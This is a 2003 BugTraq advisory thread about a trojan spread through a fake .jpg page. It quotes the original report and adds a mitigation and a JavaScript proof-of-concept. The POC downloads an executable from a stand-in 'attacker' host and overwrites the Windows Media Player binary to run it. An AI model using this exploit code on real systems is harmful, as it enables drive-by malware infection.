BugTraq
Re: a dangerous fast spreading (yet simple) trojan horse. Oct 27 2003 05:47PM
K-OTiK Security (Special-Alerts k-otik com)
In-Reply-To: <000f01c39ced$e5abce50$0900000a@whitestar>

it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet Explorer File Download and Execution" :

http://www.k-otik.com/WMPLAYER-TEST/

http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm

To prevent this exploit : Disable Active Scripting

Regards.

K-Otik Staff /// http://www.k-otik.com

----------------------- POC -------------------------

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://attacker/trojan.exe",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;

s.Type = 1;

s.Open();

s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

location.href = "mms://";

-----------------------------------------------------

>From: "Gadi Evron" <ge (at) egotistical.reprehensible (dot) net [email concealed]>

>Subject: a dangerous fast spreading (yet simple) trojan horse.

>Date: Mon, 27 Oct 2003 16:52:57 -0800

>

>I usually do not email about "new" trojan horses unless they have

>something "special" about them, for there are a lot of them coming out

>non-stop. However, with this one,

>Although quite simple, is very destructive and spreading at incredible

>speed.

>

>The trojan horse spreads by people going to different URL's to download

>a *.jpg (started with britney.jpg).

>

>The jpeg is actually an HTML file, and when the web browser receives it,

>it thinks that it is a server error message for the file not existing,

>and loads the page.

>

>In the page we find a javascript line, that using hex encoding in an

>attempt to hide what it does, downloads patch.exe and replaces

>mplayer.exe with the new file.

>patch.exe connects to the mIRC DDE server, causing mIRC to spam, and

>then it start ruining the system's registry. Starting to delete keys at

>root and enumerating from there, one at a time.

>What I signify, and forgive my language, as an "Hump and dump" trojan

>horse.

>

>This reminds me of the first patch.exe trojan horse, that was purely a

>destructive file - back in 95/96.

>

>I would also like to commend angelfire for shutting down the first web

>page this appeared on very quickly. They always respond to abuse in a

>timely manner. The geocities page is still up last time I checked.

>

>Not very complicated, but interesting, and very dangerous.

>

> Gadi Evron (i.e. ge),

> ge (at) linuxbox (dot) org. [email concealed]

>

>--------

>gevron (at) netvision.net (dot) il [email concealed]

>PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID).

>Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741.

>

>

>

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